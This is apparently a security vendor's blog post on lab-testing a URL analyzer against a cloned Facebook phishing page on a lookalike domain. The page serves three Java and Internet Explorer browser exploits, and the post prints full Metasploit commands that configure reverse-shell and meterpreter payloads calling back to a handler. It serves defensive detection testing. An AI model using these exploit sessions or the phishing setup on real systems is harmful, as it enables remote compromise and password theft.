Statistical URL Analyzer – with MetaSploit

In continuation with the previous blog, wherein I have given a sneak preview about Statistical URL Analyzer. In this series of blog-posts, we shall briefly look into the MetaSploit and SET, two of the most widely used kits, which are used for generating, deployment and exploiting the systems.

In this article, we shall briefly look into the MetaSploit and SET, two of the most widely used kits, which are used for generating payloads laced with exploits, their deployment and eventually for exploiting the systems. Our use of MetaSploit is limited to testing the SURL Analyzer and simulate real-world scenarios.

Speaking about MetaSpolit, reminds me of a very recent hack attack on two of Nepalese Government Website, which were compromised and a drive-by download was being served. The full report can be viewed here.  In their research they found out that the malware JAR was created using MetaSploit.

Snippet of the report, to highlight usage of MetaSploit

“… It’s interesting to note that all those compromises had injected code that was taken from the Metasploit framework, served in clear form, and not obfuscated. Although the use of code from the Metasploit framework doesn’t necessarily indicate a link between all the compromises …”

For testing the Statistical URL Analyzer, we setup Virtual Machines with BackTrack 5 and created a few payloads which consisted of Phishing pages, exploits laced pages, all being served via a website which has been cloned.

In the below example, we have cloned facebook.com for two purposes:

1: Create a malicious page which will infect the victims machine

2: Capture passwords, in real-world this would be nothing less than a Phishing web-site

While simulating a real-world scenario, it is imperative to know that:

1: A Genuine website is hacked using various methods and malicious code is inserted

2: Fake domain, similar to the domain, whose users are being targeted; is registered, a web-server is deployed and the trap is set. Eg. www.faceb0ok.com

3: Sometimes, we come across URLs with seemingly long domains www.facebook.com.fake.domain.com. These type of domains are mostly targeted towards Smart-Phone users. Smart-Phone users when viewing the link will view only the first few characters of the entire domain, effectively giving them a false sense of belief that they are visiting hxxp://www.facebook.com. In this scenario, additional sub-domains are created to spoof the actual domain.

In order to ensure the effectiveness and to test the rigidity of the algorithm, we modified the hosts file and added the fake domain entries into it. This virtually ensures that from the test machine, facebook.com will point to the lab server. Entries in the hosts file take precedence over the domain resolution via a DNS server. This was done to simulate the real-world scenario.

Eg 1. entry in hosts file '127.0.0.1      www.facebrok.com'
Eg. 2.entry in hosts file '127.0.0.1      www.faceb0ok.com'

MetaSploit Configuration for various vulnerabilities

Exploit     : 1
CVE         : 2012-4681
OSVDB       : 84867
Reference   : Link

MetaSploit Commands

msf exploit(java_jre17_exec)> use exploit/multi/browser/java_jre17_exec
msf exploit(java_jre17_exec)> set PAYLOAD java/shell/reverse_tcp
PAYLOAD => java/shell/reverse_tcp
msf exploit(java_jre17_exec)> set LHOST 192.168.5.200
LHOST => 192.168.5.200
msf exploit(java_jre17_exec)> set SRVPORT 80
SRVPORT => 80
msf exploit(java_jre17_exec)> set URIPATH /
URIPATH => /
msf exploit(java_jre17_exec)> exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.5.200:4444
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.5.200:80/
[*] Server started.
Exploit    : 2
CVE        : 2012-1723
OSVDB      : 82877
BID        : 52161
Reference  : Link

MetaSploit Commands

Msf exploit(java_verifier_field_access)>
use exploit/multi/browser/java_verifier_field_access
msf exploit(java_verifier_field_access)> set TARGET 1
TARGET => 1
Msf exploit(java_verifier_field_access)>
set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(java_verifier_field_access) > set LHOST 192.168.5.200
LHOST => 192.168.5.200
msf exploit(java_verifier_field_access) > set SRVPORT 80
msf exploit(java_verifier_field_access)> set URIPATH /1
SRVPORT => 80
URIPATH => /1
msf exploit(java_verifier_field_access)> exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.5.200:4444
[*] Using URL: http://0.0.0.0:80/1
[*] Local IP: http://192.168.5.200:80/1
[*] Server started.
Exploit    : 3
CVE        : 2012-4969
OSVDB      : 85532
MSB        : MS12-063
Reference  : Link

MetaSploit Commands

Msf exploit(ie_execcommand_uaf)> use exploit/windows/browser/ie_execcommand_uaf
msf exploit(ie_execcommand_uaf)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ie_execcommand_uaf) > set LHOST 192.168.5.200 
LHOST => 192.168.5.200
msf exploit(ie_execcommand_uaf) > set SRVPORT 80
SRVPORT => 80
msf exploit(ie_execcommand_uaf) > set URIPATH /2
URIPATH => /2
msf exploit(ie_execcommand_uaf) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.5.200:4444 
[*] Using URL: http://0.0.0.0:80/2
[*] Local IP: http://192.168.5.200:80/2
[*] Server started.

The goal of this exercise was to see whether SURL Analyzer is able to detect these pages as malicious or not. The logical reasoning is that if there is detection then it can be mitigated. Detection based solely on algorithm and not a database full of malicious urls.

Result 1:

Checking : http://www.facebrok.com
action = 0
0-scripts-0
ApInv=1 #Mal
Results=1
Analysis Time=0.00176063379471494 seconds
Total Time=0.0274778485256021 seconds
#ToolKit #Result =1 Dmn: h00p://www.facebrok.com RPT: 
https://dl.dropbox.com/u/12294415/SURL/10_05/p_www_facebrok_com_195848.txt

MetaSploit Console Output:

[*] 192.168.5.200    java_jre17_exec - 
Java 7 Applet Remote Code Execution handling request

Result 2:

Checking : http://www.facebrok.com/1
Server Header REDIRECTING to : /1/
action = 0
0-scripts-0
JAsz=1 #Mal
JAc=1 #Mal
Results=2
Analysis Time=0.196207084964831 seconds
Total Time=1.67632544065315 seconds
#ToolKit #Result =2 Dmn: h00p://www.facebrok.com RPT: 
https://dl.dropbox.com/u/12294415/SURL/10_05/p_www_facebrok_com_200158.txt

MetaSploit Console Output:

[*] 192.168.5.200    java_verifier_field_access - 
Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution
[*] 192.168.5.200    java_verifier_field_access - 
Generated executable to drop (73802 bytes).

Result 3:

Checking : http://www.facebrok.com/2
Server Header REDIRECTING to : /2/TgolD.html
Downloading Frame : www.facebrok.com/2/EpjstT.html
Sc1=1 #Mal
FR?Nor=1 
DHx=1 
Results=2
Analysis Time=0.0272505794048455 seconds
Total Time=0.112398237387382 seconds
#ToolKit #Result =2 Dmn: h00p://www.facebrok.com RPT: 
https://dl.dropbox.com/u/12294415/SURL/10_05/p_www_facebrok_com_200417.txt

MetaSploit Console Output:

[*] 192.168.5.200    ie_execcommand_uaf - 
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322)
[*] 192.168.5.200    ie_execcommand_uaf - Redirecting to TgolD.html
[*] 192.168.5.200    ie_execcommand_uaf - 
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322)
[*] 192.168.5.200    ie_execcommand_uaf - Loading TgolD.html
[*] 192.168.5.200    ie_execcommand_uaf - Using msvcrt ROP
[*] 192.168.5.200    ie_execcommand_uaf - 
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322)
[*] 192.168.5.200    ie_execcommand_uaf - Loading EpjstT.html

The next blog-post will contain my explanation pertaining the internal workings of SURL analyzer. Till then – Stay Safe.

This entry was posted in eScan 11 and tagged . Bookmark the permalink.